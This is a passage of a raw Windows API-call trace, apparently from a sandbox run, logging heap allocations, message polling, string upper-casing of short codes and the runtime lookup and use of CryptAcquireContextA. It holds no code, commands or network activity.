[0198.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0198.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0198.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0198.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0198.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466dd0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0198.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0198.977] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0198.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0198.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0198.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0198.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466dd0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0198.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0198.978] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0198.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0198.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3688 | out: hHeap=0x25c0000) returned 1 [0198.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0198.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0198.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0198.979] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad6480) returned 1 [0198.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0198.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0198.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0198.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0198.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0198.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0198.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0198.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0198.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0198.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0198.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0198.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0198.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0198.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0198.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0198.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0198.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0198.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0198.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0198.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0198.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0198.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0198.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0198.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0198.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0198.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0198.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0198.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0198.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0198.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0198.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0198.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0198.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0198.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0198.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0198.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0198.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0198.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0198.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0198.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0198.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0198.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0198.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0198.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0198.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0198.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0198.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0198.982] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0198.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0198.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0198.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0198.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0198.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0198.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0198.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0198.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0198.983] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0198.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0198.983] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0198.983] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0198.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0198.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0198.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0198.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0198.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0198.983] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0198.983] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.983] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0198.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0198.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0198.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0198.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0198.984] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.984] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.984] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.984] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0198.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0198.984] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0198.984] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0198.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0198.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0198.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0198.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0198.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0198.984] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0198.984] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.984] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0198.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0198.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0198.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0198.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0198.985] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.985] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0198.985] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0198.985] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0198.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0198.985] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0198.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0198.985] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0198.985] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0198.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0198.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0198.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0198.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0198.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0198.985] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0198.985] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.986] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0198.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0198.986] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0198.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0198.986] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0198.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0198.986] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0198.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0198.986] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0198.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0198.986] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0198.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0198.986] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0198.986] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0198.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0198.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0198.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0198.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0198.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0198.987] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0198.987] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.987] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0198.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0198.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0198.987] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0198.987] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0198.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0198.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0198.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0198.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0198.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0198.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0198.987] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0198.987] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0198.987] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0198.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0198.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0198.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0198.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0198.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0198.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0198.988] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.988] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0198.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0198.988] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0198.988] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0198.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0198.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0198.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0198.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0198.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0198.988] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0198.988] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, 